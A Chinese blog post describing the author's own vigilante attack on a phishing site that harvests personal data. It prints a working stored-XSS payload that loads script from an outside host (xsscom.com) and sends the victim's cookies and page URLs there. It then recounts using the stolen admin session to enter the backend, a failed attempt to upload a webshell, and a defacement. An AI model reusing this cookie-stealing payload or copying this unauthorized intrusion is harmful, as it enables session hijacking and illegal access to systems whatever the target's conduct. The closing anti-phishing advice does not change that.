利用xss注入某非法获取个人信息网站

想到诈骗分子现在还是这么猖狂,居然把非法获取个人信息的二维码发到我的眼前,这我又怎么能忍~这不得想办法打掉他.随便做一下网络安全科普,当然了,自己也还是在学习的小白.

声明:以下仅为一次简单的记录,提供思路及过程,仅供学习交流,请不要用于非法用途,由此教程产生的法律问题均与本人无关!

0x01

和往常一样正常打开QQ,无意间看到群消息有这么一个文档.,出于本能,这肯定是个钓鱼网站…那就扫进去看看究竟有什么猫腻.,可以看到,扫进去之后是这么一个页面。吐槽一下这网站做得一眼假好吧。。但是上当受骗的人还是很多。

0x02

为了先了解一下网站结构,先随便输入信息提交吧。

0x03

漏洞复现

只要用户能输入的地方大部分都存在xss漏洞,其中储存型漏洞伤害较大。在输入框这里输入js代码,可用src引入引入自己的代码,

<div style="display:none"><script src=http://xsscom.com//Wn7zcb></script></div>

其中引入的具体代码如下

(function(){(new Image()).src='http://xsscom.com/index.php?do=api&id=Wn7zcb&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xsscom.com/index.php?do=keepsession&id=Wn7zcb&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

利用的是后台直接输出用户输出的内容,浏览器直接执行用户输入的恶意木马,能够document.cookie,当后台执行我插入的木马之后,就会发送后台地址以及token到我这里。没一会儿就中招了。

可以看到后台地址,对方的ip以及ua信息,cookie。成功进入后台

可以看到很多大学生的信息…而且很多条,并且它有很多个网站,所以收集了大量信息,并且又利用被获取的继续发送,广泛传播。原本想在这个上传点传入大马getshell的,但是一直没能成功,图片马也不能解析。因此没有获取到服务器。只能挂个黑页了

所有呢在最后我希望你们不要看到获取信息的输入框就输入自己的个人信息,也不要随便扫二维码。在打开未知的网站前可以去去工信部查询对方网站是否为备案以及有相应的运行资质。政府网站后缀统一为gov.cn,学校网站后缀统一为edu.cn后缀等

声明:本站为非盈利个人记录网站多数图片来自于正版授权,少部分转载自网络,原创内容版权归本站所有,转载内容归原作者所有。如有内容、图片、信息侵犯到您的合法权益,请联系我(7@7zz.cn)做删除处理。

给TA打赏
共{{data.count}}人
人已打赏
4 条回复 A文章作者 M管理员
  1. 威武用鲜花

    点赞是不可能点赞的

  2. 薯片整齐

    超喜欢这里的

  3. […] 手撕某非法获取个人信息网站 […]

个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索